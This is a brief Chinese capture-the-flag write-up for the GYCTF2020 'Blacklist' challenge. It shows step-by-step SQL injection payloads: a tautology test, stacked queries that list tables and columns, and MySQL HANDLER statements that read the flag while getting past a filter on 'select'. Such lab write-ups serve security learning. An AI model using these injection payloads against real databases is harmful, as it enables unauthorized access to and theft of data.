[GYCTF2020]Blacklist-1|SQL注入|堆叠注入
1、打开之后确定是否存在注入点,构造闭合的sql语句,payload:1' or '1'='1,结果如下:
2、尝试进行联合注入获取列数和可以回显的信息,但是发现select被过滤,结果如下:
3、联合查询行不通那就尝试下堆叠注入,payload:1';show tables;,获取表的名称,结果如下:
4、获取到表明之后,通过payload:1';show columns from FlagHere;#,获取到列明信息,结果如下:
5、获取到列明信息后通过handler语句来获取flag值(这里在网上查找的,还是缺少积累,都不了解handler),payload:1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#,结果如下:
handler参考文章:https://blog.csdn.net/jesseyoung/article/details/40785137